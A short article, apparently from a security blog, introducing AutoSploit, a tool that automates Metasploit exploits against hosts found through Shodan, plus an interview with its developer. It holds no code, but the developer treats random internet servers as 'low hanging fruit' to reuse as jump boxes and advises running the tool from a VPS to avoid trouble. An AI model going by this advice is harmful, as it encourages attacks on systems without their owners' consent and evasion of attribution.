The Metasploit Framework has existed in some form or another since H.D. Moore first developed the application in 2003. It’s very popular penetration testing software, and Rapid7 saw its potential when they bought the Metasploit Project in 2009. Over 1,600 exploits and nearly 500 payloads have been developed for use in the Framework which target a plethora of operating systems and applications. As of 2018, Metasploit Framework is free and opensource, and Metasploit Pro is paid software with commercial support.
On January 30th, VectorSEC announced on Twitter that they developed AutoSploit, a Python script for Metasploit. It does what it’s named to do: it automates Metasploit sessions. It has been released on GitHub as opensource software under the GPL v3.0 license.
Here’s a description from the README file on GitHub:
“As the name might suggest, AutoSploit attempts to automate the exploitation of remote hosts. Targets are collected automatically as well by employing the Shodan.io API… the 'Exploit' component of the program will go about the business of attempting to exploit these targets by running a series of Metasploit modules against them. Which Metasploit modules will be employed in this manner is determined by programmatically comparing the name of the module to the initial search query. However, I have added functionality to run all available modules against the targets in a 'Hail Mary' type of attack as well...”
AutoSploit sounds like an exciting new tool for network vulnerability testers, so I asked VectorSEC (VS) a few questions about it.
I asked about the development process:
VS: “I am a fan of automation and programming in general. I wanted to see if I could make Metasploit even easier to use so I did. I didn't exactly keep count of how long it took to develop, but all in all I would say I spent a good couple of days getting everything set up properly.”
How can AutoSploit benefit red teams?
VS: “I would say that if you intend to use this program in an engagement as a red teamer, then it might be a good idea to provide your own host list. An engagement like that is really directed at a specific company’s infrastructure while AutoSploit's manner of collecting targets is rather broad, you input a platform and you get a list of IPs returned from Shodan. These can be from all over the world of course, which is not exactly a directed approach to pentesting a company. However, by gathering targets from Shodan, you are able to easily get the low hanging fruit. These servers can later be used as staging servers or jump boxes for later operations.”
Can AutoSploit really make work done with Metasploit more efficient?
VS: “I would say so. While AutoSploit is busy running various Metasploit modules on the gathered targets, the pentester has more time to focus on other tasks.”
What should pentesters who are considering trying AutoSploit know beforehand?
VS: “If anyone is thinking of using the program ‘as is,’ they need to be aware that AuutoSploit will try to get Reverse TCP shells. These connect to the IP address you set up. If that IP is linked to your home set up, you might get in trouble. I don't condone anything illegal, but it might be best practice to run the tool from a virtual private server that has the dependencies you need installed. Happy hacking!”
Instructions for downloading and using AutoSploit can be found on GitHub.